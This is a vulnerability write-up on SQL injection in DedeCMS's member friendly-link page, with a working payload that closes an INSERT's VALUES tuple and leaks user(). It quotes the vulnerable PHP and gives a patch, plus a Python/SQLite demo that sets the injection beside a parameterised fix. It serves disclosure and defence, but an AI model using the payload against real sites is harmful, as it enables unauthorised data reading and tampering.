1. Vulnerability Description
SQL injection in the member module. The friendly-link management page /member/flink_main.php builds an INSERT statement by string concatenation, and a link URL that already starts with http:// is never passed through HtmlReplace(). Any logged-in member can therefore terminate the VALUES tuple, append rows of their own choosing to `#@__member_flink`, and read query results (for example user()) back through their own link list.
Relevant Link:
http: // HdhCmsTestcnseay测试数据/1959/
2. Trigger Conditions
1. Log in as a member and open http://127.0.0.1/dedecms/member/flink_main.php#
2. In the link URL field enter the following (the link name can be anything):
http://sss2'),(8,1,@`'`),(8,(select user()),'33333
The 8 is your member ID: the injected rows are written with mid=8, so they only appear in your own link list if that is your ID. You can read your ID from the DedeUserID cookie.
Because the value starts with http:// it skips HtmlReplace() and is interpolated raw. The first ' and ) close the original VALUES tuple; what follows appends two further rows, the second of which stores the result of (select user()) as a link title, and GetLinkList() then displays it.
Relevant Link:
http: // HdhCmsTestwooyun.org/bugs/wooyun-2014-048878
3. Affected Scope
4. Vulnerable Code Analysis
/member/flink_main.php
if ($dopost == "addnew")
{
    AjaxHead();
    $row = $dsql->GetOne("Select count(*) as dd From `#@__member_flink` where mid='".$cfg_ml->M_ID."'");
    if ($row['dd'] >= 50)
    {
        echo "<font color='red'>Failed to add URL: the limit of fifty URLs has already been reached!</font>";
        GetLinkList($dsql);
        exit();
    }
    // If the value already starts with http:// it is not filtered at all
    if (!eregi("^http://", $url))
    {
        $url = "http://".HtmlReplace($url, 2);
    }
    $title = HtmlReplace($title);
    // $url is concatenated into the SQL statement without having been filtered
    $inquery = "INSERT INTO `#@__member_flink`(mid,title,url) VALUES(".$cfg_ml->M_ID.",'$title','$url');";
    $dsql->ExecuteNoneQuery($inquery);
    echo "<font color='red'>Link added successfully!</font>";
    GetLinkList($dsql);
    exit();
}
The only defence on $url is the eregi() branch, and it runs HtmlReplace() only when the http:// prefix is missing. A value that already carries the prefix reaches $inquery unchanged, so the single quote in the payload from section 2 ends the url literal, the ) ends the tuple, and the remainder becomes two extra VALUES tuples of the same INSERT. The member ID in those tuples is attacker-chosen, which is why the payload has to repeat the victim's own DedeUserID for the rows to show up in their list.
5. Defense
/member/flink_main.php
if ($dopost == "addnew")
{
    AjaxHead();
    $row = $dsql->GetOne("Select count(*) as dd From `#@__member_flink` where mid='".$cfg_ml->M_ID."'");
    if ($row['dd'] >= 50)
    {
        echo "<font color='red'>Failed to add URL: the limit of fifty URLs has already been reached!</font>";
        GetLinkList($dsql);
        exit();
    }
    // If the value already starts with http:// it is not filtered here
    if (!eregi("^http://", $url))
    {
        $url = "http://".HtmlReplace($url, 2);
    }
    $title = HtmlReplace($title);
    /* filter $url unconditionally, whether or not it carried the http:// prefix */
    $url = HtmlReplace($url);
    /**/
    $inquery = "INSERT INTO `#@__member_flink`(mid,title,url) VALUES(".$cfg_ml->M_ID.",'$title','$url');";
    $dsql->ExecuteNoneQuery($inquery);
    echo "<font color='red'>Link added successfully!</font>";
    GetLinkList($dsql);
    exit();
}
This patch closes the bypass by running HtmlReplace() on $url in every branch, so a quote in the URL no longer reaches the statement raw. It still depends on an HTML-output filter to protect an SQL statement; escaping the value through the database layer, or binding mid, title and url as parameters, removes that dependence and is the more robust fix.
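The following is an added example, not code from the original post or from DedeCMS. It reproduces the trigger from section 2 against the vulnerable statement construction analysed in section 4, and places the hardened form from section 5 beside it. The table, the html_replace() stand-in for HtmlReplace() and the SQLite adaptation of the payload are assumptions: SQLite has no user() and no @`'` user variable, so sqlite_version() and a plain string take their places, but the structure of the injection (close the VALUES tuple, append attacker rows) is exactly the one on the page. The hardened path binds all three values as parameters instead of relying on the HTML filter.

```python
import html
import re
import sqlite3

# Constructed stand-in for DedeCMS's `#@__member_flink` table (SQLite, not MySQL).
SCHEMA = """
CREATE TABLE dede_member_flink (
    aid   INTEGER PRIMARY KEY AUTOINCREMENT,
    mid   INTEGER NOT NULL,
    title TEXT    NOT NULL,
    url   TEXT    NOT NULL
);
"""

# The page's payload adapted for SQLite: sqlite_version() stands in for MySQL's
# user(), and a plain string 'x' for the @`'` user variable, which SQLite lacks.
PAYLOAD = "http://sss2'),(8,'x','y'),(8,(select sqlite_version()),'33333"

# Exposed so a caller can compare the leaked title against the real version string.
SQLITE_VERSION = sqlite3.sqlite_version


def html_replace(s: str) -> str:
    """Stand-in for DedeCMS HtmlReplace(): HTML-escapes the value, quotes included.
    Assumption: it models only what the page relies on (quotes no longer reach SQL raw)."""
    return html.escape(s, quote=True)


def build_insert_vulnerable(mid: int, title: str, url: str) -> str:
    """Mirrors the flink_main.php logic: a URL that already starts with http://
    skips HtmlReplace() and is interpolated into the INSERT exactly as submitted."""
    if not re.match(r"^http://", url, re.IGNORECASE):   # eregi("^http://", $url)
        url = "http://" + html_replace(url)
    title = html_replace(title)
    return (f"INSERT INTO dede_member_flink(mid,title,url) "
            f"VALUES({mid},'{title}','{url}')")


def add_link_vulnerable(conn: sqlite3.Connection, mid: int, title: str, url: str) -> None:
    """Executes the concatenated statement, so the payload's extra tuples are inserted too."""
    conn.execute(build_insert_vulnerable(mid, title, url))
    conn.commit()


def add_link_hardened(conn: sqlite3.Connection, mid: int, title: str, url: str) -> None:
    """Escapes every field for HTML output and binds all three values as parameters,
    so the driver quotes them and the URL can never terminate the VALUES tuple."""
    if not re.match(r"^https?://", url, re.IGNORECASE):
        url = "http://" + url
    conn.execute(
        "INSERT INTO dede_member_flink(mid,title,url) VALUES(?,?,?)",
        (mid, html_replace(title), html_replace(url)),
    )
    conn.commit()


def links_for(conn: sqlite3.Connection, mid: int) -> list:
    """What GetLinkList() would show this member, as (title, url) in insertion order."""
    cur = conn.execute(
        "SELECT title, url FROM dede_member_flink WHERE mid=? ORDER BY aid", (mid,))
    return [tuple(row) for row in cur.fetchall()]


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def demo() -> dict:
    """Submits the payload as member 8 through both code paths and returns each listing.
    Vulnerable path: three rows, the last one's title being the leaked sqlite_version().
    Hardened path: a single row whose url is the payload stored as an inert string."""
    vuln = fresh_db()
    add_link_vulnerable(vuln, 8, "anything", PAYLOAD)
    safe = fresh_db()
    add_link_hardened(safe, 8, "anything", PAYLOAD)
    return {"vulnerable": links_for(vuln, 8), "hardened": links_for(safe, 8)}


if __name__ == "__main__":
    for path, rows in demo().items():
        print(path)
        for title, url in rows:
            print(f"  title={title!r} url={url!r}")
```

The leaked value appears in the title column because the injected tuple places the subquery in the title position, which is exactly why the page's payload puts (select user()) there: the link list renders titles. Replacing sqlite_version() with user() and 'x' with @`'` gives back the MySQL form.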
6. Attack and Defense Reflections
Copyright (c) 2015 LittleHann All rights reserved
dedecms /member/flink_main.php SQL Injection Vul